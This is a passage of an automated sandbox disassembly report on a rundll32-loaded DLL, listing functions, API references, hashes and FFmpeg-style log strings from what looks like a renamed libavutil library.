                                                                      • Instruction Fuzzy Hash: 34311AB86087068FD700DF6AD58061AFBE4FF88394F51892EE99CC7211E774E855CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
                                                                      • String ID:
                                                                      • API String ID: 1780169607-0
                                                                      • Opcode ID: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
                                                                      • Instruction ID: c35801f6e3b9458600ddf5c5e3e107538d07f14f20f18202b00d36dbdc320db3
                                                                      • Opcode Fuzzy Hash: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
                                                                      • Instruction Fuzzy Hash: C731E5B4116350CED740EF50D548A86BAE0FF00354FA7C5A9D61A4F222C7BED584DBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_mallocz.F072 ref: 1001E381
                                                                      • mv_frame_alloc.F072 ref: 1001E390
                                                                        • Part of subcall function 1001AC40: mv_malloc.F072 ref: 1001AC56
                                                                      • mv_frame_ref.F072 ref: 1001E3A6
                                                                        • Part of subcall function 1001BC40: mv_channel_layout_check.F072 ref: 1001BC94
                                                                        • Part of subcall function 1001BC40: mv_channel_layout_check.F072 ref: 1001BCDF
                                                                        • Part of subcall function 1001BC40: mv_buffer_ref.F072 ref: 1001BD0E
                                                                        • Part of subcall function 1001BC40: mv_calloc.F072 ref: 1001BD48
                                                                        • Part of subcall function 1001BC40: mv_buffer_ref.F072 ref: 1001BD97
                                                                      • mv_buffer_ref.F072 ref: 1001E3B4
                                                                        • Part of subcall function 10009FC0: mv_mallocz.F072 ref: 10009FD2
                                                                      • mv_buffer_create.F072 ref: 1001E3ED
                                                                        • Part of subcall function 10009E60: mv_mallocz.F072 ref: 10009E86
                                                                        • Part of subcall function 10009E60: mv_mallocz.F072 ref: 10009EBF
                                                                      • mv_buffer_unref.F072 ref: 1001E413
                                                                      • mv_frame_free.F072 ref: 1001E41B
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_buffer_ref$mv_channel_layout_check$mv_buffer_createmv_buffer_unrefmv_callocmv_frame_allocmv_frame_freemv_frame_refmv_malloc
                                                                      • String ID:
                                                                      • API String ID: 2471893243-0
                                                                      • Opcode ID: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
                                                                      • Instruction ID: e44850cc1d663ee6b079855d6d5ccf767aeb5a2a45f4db7414dc8b10b7331849
                                                                      • Opcode Fuzzy Hash: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
                                                                      • Instruction Fuzzy Hash: EA21B3745087458FD780EF29C58021EFBE0EF89350F51892DFA988B346EB74E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • av_image_get_linesize failed, xrefs: 10022A16
                                                                      • Assertion %s failed at %s:%d, xrefs: 10022AB1
                                                                      Similarity
                                                                      • API ID: abortmv_image_get_linesizemv_logmv_pix_fmt_desc_get
                                                                      • String ID: Assertion %s failed at %s:%d$av_image_get_linesize failed
                                                                      • API String ID: 1423692287-2525362290
                                                                      • Opcode ID: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
                                                                      • Instruction ID: a2789ba4896ffccc60d1fb11a9358e28422a5f1174f25c27da114458ab982159
                                                                      • Opcode Fuzzy Hash: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
                                                                      • Instruction Fuzzy Hash: 59D1AC75A093519FC354CF68D080A2AFBF1FF88354F96896DE8899B311E735E981CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F072 ref: 1002319F
                                                                      • mv_image_get_linesize.F072 ref: 100231D4
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      • mv_image_fill_linesizes.F072(?), ref: 10023268
                                                                      • mv_image_fill_plane_sizes.F072(?), ref: 100232CB
                                                                      Strings
                                                                      • Picture size %ux%u is invalid, xrefs: 1002331F
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
                                                                      • String ID: Picture size %ux%u is invalid
                                                                      • API String ID: 3680373976-1963597007
                                                                      • Opcode ID: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
                                                                      • Instruction ID: 42873512ec11e61a891db32c639e21bb7bc2094a7c171237446aa949f8b4b16f
                                                                      • Opcode Fuzzy Hash: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
                                                                      • Instruction Fuzzy Hash: 80513576A083418BC384CF69D88064EBBE2EFC8750F55CA3EE598C7350EA75DA448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
                                                                      • String ID:
                                                                      • API String ID: 806756221-0
                                                                      • Opcode ID: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
                                                                      • Instruction ID: 1123dba4393114ef0ad0658bdbc6ab6a3ceb4212d851131ba1441c628290b326
                                                                      • Opcode Fuzzy Hash: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
                                                                      • Instruction Fuzzy Hash: 8C4114B55093449BC360CF28C08025ABBE5FF85394F55892EE9988B341E636EA95CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _errno$_sopenrandstrlen
                                                                      • String ID: XXXX
                                                                      • API String ID: 1081397658-1518373315
                                                                      • Opcode ID: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
                                                                      • Instruction ID: 5ba2c4e2c30cf57021d4c67dc99ab4cf3299af9f9df0caf2ec803c7fcbdd4207
                                                                      • Opcode Fuzzy Hash: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
                                                                      • Instruction Fuzzy Hash: A62137B190934A9FC704EF24889015E7BE4EF86394F11C92DF4998B291D6399A49DB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: AMBI%d$NONE$USR%d
                                                                      • API String ID: 3083893021-3656852315
                                                                      • Opcode ID: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
                                                                      • Instruction ID: 215f8c01a0ebe083e3755320398acc4362dbfeb093f1504df316b337c640c054
                                                                      • Opcode Fuzzy Hash: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
                                                                      • Instruction Fuzzy Hash: 16012CB8909B418BD304EF28848052EBAE1FF84284FD48A6DE4CC87755E639DA409B83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: ambisonic ACN %d$none$user %d
                                                                      • API String ID: 3083893021-4180635230
                                                                      • Opcode ID: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
                                                                      • Instruction ID: 324eb216ddd130d516033ba78e4077f7499b10045cf144ab3190435d7abd8d01
                                                                      • Opcode Fuzzy Hash: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
                                                                      • Instruction Fuzzy Hash: 77012CB8D09B418BD304EF28908152DBAE1FFC4288FD4CA6DE4CC87355E639DA408B53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F072 ref: 1001B043
                                                                      • mv_image_check_size.F072 ref: 1001B069
                                                                        • Part of subcall function 100221C0: mv_image_get_linesize.F072 ref: 10022203
                                                                      • mv_image_fill_linesizes.F072 ref: 1001B0C8
                                                                        • Part of subcall function 100215D0: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      • mv_image_fill_plane_sizes.F072 ref: 1001B15D
                                                                      • mv_buffer_alloc.F072 ref: 1001B1CD
                                                                      • mv_image_fill_pointers.F072 ref: 1001B1FC
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
                                                                      • String ID:
                                                                      • API String ID: 566543421-0
                                                                      • Opcode ID: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
                                                                      • Instruction ID: 4992ce4e1065cc46e00ece35f003ee7f574db56b11f2f258b44564899a0fbe5b
                                                                      • Opcode Fuzzy Hash: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
                                                                      • Instruction Fuzzy Hash: 4561E7B5A08B018FCB44DF69D59065ABBE1FF88240F16897DE949CB315E735E844CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
                                                                      • String ID:
                                                                      • API String ID: 1431812533-0
                                                                      • Opcode ID: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
                                                                      • Instruction ID: 9aa00ebb7c7a901d7ff1af15f7d5cd17a7e62451d1a9c752bdbd2b923dfe8871
                                                                      • Opcode Fuzzy Hash: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
                                                                      • Instruction Fuzzy Hash: F0514A75A047169FD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E9948B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
                                                                      • _amsg_exit.MSVCRT ref: 10001086
                                                                      Similarity
                                                                      • API ID: Sleep_amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 1015461914-0
                                                                      • Opcode ID: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
                                                                      • Instruction ID: 2785d9bf782298c98c7f05eb770d18c25c91c74859540191a5f4291f5604d36f
                                                                      • Opcode Fuzzy Hash: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
                                                                      • Instruction Fuzzy Hash: D031DE70609291CBF341DF69C9C838A77E0EB843D4F11842DED888B65CD7B9D980CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_channel_layout_from_maskmv_freepstrcmp
                                                                      • String ID:
                                                                      • API String ID: 3576703362-0
                                                                      • Opcode ID: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
                                                                      • Instruction ID: f14a3d27c2c21489c07e4dbc689c5fec37a1484687acd34e25a8149a501b133e
                                                                      • Opcode Fuzzy Hash: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
                                                                      • Instruction Fuzzy Hash: 45312535A083819FE340EF25D48062FBBE1EF84394F52992EF98997314D671EC40CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_image_get_linesize.F072 ref: 100220C7
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      • mv_log.F072 ref: 10022171
                                                                      • mv_log.F072(?), ref: 100221AE
                                                                      Strings
                                                                      • Picture size %ux%u is invalid, xrefs: 10022154
                                                                      • Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1002219E
                                                                      Similarity
                                                                      • API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
                                                                      • String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
                                                                      • API String ID: 1737039923-91635712
                                                                      • Opcode ID: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
                                                                      • Instruction ID: d1011bfbbf7dbf5d13950a67888087e963138b3faade39ec3db9adc7e097331a
                                                                      • Opcode Fuzzy Hash: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
                                                                      • Instruction Fuzzy Hash: 9441D0B5A083549FC340CF69C48060AFBE1FBD8750F958A2EF9A8D3350E774E9458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: strcmpstrncmpstrtol
                                                                      • String ID: AMBI
                                                                      • API String ID: 155133989-3084986980
                                                                      • Opcode ID: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
                                                                      • Instruction ID: 080b42f47ecb1617c9eeb941eeb6b1a796e462e2a98a72bb2a37a4396a6a9be9
                                                                      • Opcode Fuzzy Hash: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
                                                                      • Instruction Fuzzy Hash: 6A21BEB5A0C7858FF350CF2898C064FBAD0EB492D1F11893EF989C7355E235E8858B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_dict_setmv_strlcatfstrftime
                                                                      • String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
                                                                      • API String ID: 3046200060-930656424
                                                                      • Opcode ID: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
                                                                      • Instruction ID: 4200585820eefb0ad3589c066a71afa0f6c055d7c0249a28ce441d2d822c6705
                                                                      • Opcode Fuzzy Hash: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
                                                                      • Instruction Fuzzy Hash: 3F21B0B5A093419FD350DF29E58069BBBE0FB88354F51C92EF89CC7301E638D8849B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: @%s$NONE
                                                                      • API String ID: 3083893021-9228147
                                                                      • Opcode ID: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
                                                                      • Instruction ID: 7566f4ee250c6b1008f1cbc21f7ab5f057a1ffbd92fde749fdda637f05722331
                                                                      • Opcode Fuzzy Hash: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
                                                                      • Instruction Fuzzy Hash: 8C114C75909B1A8BE720EF18C58006EF7E1FB443D4F55891EE889A7219D731EC94CBE2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                                      Similarity
                                                                      • API ID: _close_errnomv_logmv_strerrormv_strlcpy
                                                                      • String ID: Error occurred in fstat(): %s
                                                                      • API String ID: 1199337903-68092211
                                                                      • Opcode ID: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
                                                                      • Instruction ID: dfd730866d5ba72d1ec682aa82f713c85e766a8eb03f77e440fb808261e44811
                                                                      • Opcode Fuzzy Hash: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
                                                                      • Instruction Fuzzy Hash: A3F092B4819755DFC310DF14C48425EFBE4FF84700F51881EE5D997321DB78A9459B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: strlen$strchrstrncmp
                                                                      • String ID: -
                                                                      • API String ID: 2264528763-2547889144
                                                                      • Opcode ID: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
                                                                      • Instruction ID: 5f1f2dd0eab5bc6f8befd7c2bb33942bdc2d6399c7dfe7216c1ccb09edde324b
                                                                      • Opcode Fuzzy Hash: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
                                                                      • Instruction Fuzzy Hash: 6F318075A0C3558FEB50DA78949026EBBE1FF893C4F05492DF9C8D7245D278D9068B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_mallocz
                                                                      • String ID:
                                                                      • API String ID: 2455733640-0
                                                                      • Opcode ID: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
                                                                      • Instruction ID: 3b99154a913b274524c08becb6f728f5f8244ec0eeb4226c169e02ad570783d9
                                                                      • Opcode Fuzzy Hash: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
                                                                      • Instruction Fuzzy Hash: 1131B074908B01CFD760DF25C581A1AB7F0FF89391B568A5DEC999B319D730E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 895301365-0
                                                                      • Opcode ID: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
                                                                      • Instruction ID: 9bf475a18fd4cb1c0505352b53a299a598f586f68b75c8a149e966f8cd1839f1
                                                                      • Opcode Fuzzy Hash: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
                                                                      • Instruction Fuzzy Hash: 0031CDB99087058FC744CF29C18045AFBE1FF88718F558A6EE889AB310D731EA45CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExclusiveLock$AcquireReleasemv_freep
                                                                      • String ID:
                                                                      • API String ID: 2444013405-0
                                                                      • Opcode ID: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
                                                                      • Instruction ID: c3c698d3df7831113588d9bdc2aa75e8a835319d0c3e7d0db2d9c6c4417e318c
                                                                      • Opcode Fuzzy Hash: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
                                                                      • Instruction Fuzzy Hash: 7B21D6B5608701CFD700EF25D5C491ABBF4EF85280F06C969E8898B31AD731E885CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
                                                                      • String ID:
                                                                      • API String ID: 3283265872-0
                                                                      • Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                                      • Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
                                                                      • Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                                      • Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 895301365-0
                                                                      • Opcode ID: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
                                                                      • Instruction ID: 4ab28d8c1afc1d5d21c0288313e81dd6decefd2b0a989d53a21eca3f7d4547be
                                                                      • Opcode Fuzzy Hash: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
                                                                      • Instruction Fuzzy Hash: 2F21AEB8908316CFCB54DF28C08095AB7E5FF89344F558A5DE999AB301D731EA46CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock_unlockcalloc
                                                                      • String ID:
                                                                      • API String ID: 3876498383-0
                                                                      • Opcode ID: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
                                                                      • Instruction ID: 8fe92059074c50cb47f0fafd9c3e369871995c2eed6e667d345993090a648f63
                                                                      • Opcode Fuzzy Hash: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
                                                                      • Instruction Fuzzy Hash: A81149B1604305CFDB80DFA8C48475ABBE0EF88340F15C6A9E888CF245EB74D840CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_bprint_escape.F072 ref: 100122B3
                                                                        • Part of subcall function 10009730: mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • mv_bprint_append_data.F072 ref: 100122CC
                                                                      • mv_bprint_escape.F072 ref: 100122EE
                                                                      • mv_bprint_finalize.F072 ref: 1001231B
                                                                      • mv_bprint_append_data.F072 ref: 1001234B
                                                                        • Part of subcall function 10008F30: mv_realloc.F072 ref: 10008F73
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 1942445456-0
                                                                      • Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                                      • Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
                                                                      • Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                                      • Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_buffer_unref
                                                                      • String ID:
                                                                      • API String ID: 1375661620-0
                                                                      • Opcode ID: b5ec8d363419cb92d8bdb1f38329e2028d6a2324dcebd7ef3df8143324761c55
                                                                      • Instruction ID: d52695f6b373eec4d5e7979f8718589b80dc3da3b7455b83048969c7455da62b
                                                                      • Opcode Fuzzy Hash: b5ec8d363419cb92d8bdb1f38329e2028d6a2324dcebd7ef3df8143324761c55
                                                                      • Instruction Fuzzy Hash: 7B0172B86086058FDB00EF79C485A1AF7F1FF84244F46CD6DE8948B316E634E885CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$strtol
                                                                      • String ID:
                                                                      • API String ID: 3596500743-0
                                                                      • Opcode ID: 7ebbe4887208d3a811f5f7b53f87de9f50cb6efb863a80ebecaab125b7496197
                                                                      • Instruction ID: 4b89768cd935a08b72e57307d992163ee312e19cf8de062bdca3011805c3dd3e
                                                                      • Opcode Fuzzy Hash: 7ebbe4887208d3a811f5f7b53f87de9f50cb6efb863a80ebecaab125b7496197
                                                                      • Instruction Fuzzy Hash: 6A01C47490931A8FD784DF65C48861BBBE1FF84754F15C82DE989C7324EB34E9048B45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_log.F072 ref: 1001F4EF
                                                                        • Part of subcall function 1001F080: mv_mallocz.F072 ref: 1001F0A0
                                                                        • Part of subcall function 1001F080: mv_realloc_f.F072 ref: 1001F0DD
                                                                        • Part of subcall function 1001F080: mv_buffer_create.F072 ref: 1001F128
                                                                      Strings
                                                                      • Could not create the texture (%lx), xrefs: 1001F504
                                                                      • Static surface pool size exceeded., xrefs: 1001F4DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_createmv_logmv_malloczmv_realloc_f
                                                                      • String ID: Could not create the texture (%lx)$Static surface pool size exceeded.
                                                                      • API String ID: 22886632-350389734
                                                                      • Opcode ID: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
                                                                      • Instruction ID: d0ee2a216646596517f8e2272bb6c8791eb02a2e11f7fe46a603028adb549b45
                                                                      • Opcode Fuzzy Hash: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
                                                                      • Instruction Fuzzy Hash: 5C4188B5A087419FC744DF29C58061ABBE1FF88700F51896EF8999B316E774E984CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: @%s
                                                                      • API String ID: 3083893021-2921637043
                                                                      • Opcode ID: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
                                                                      • Instruction ID: bde4f2789606c19ab050fa63e9045ae12eeb8ea4b86e9135c35405d0853ffa6a
                                                                      • Opcode Fuzzy Hash: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
                                                                      • Instruction Fuzzy Hash: 89215A759097068BE310EF19C48026EF7E1FF88394F12892EE88897315E731ED44CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
                                                                      • is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log
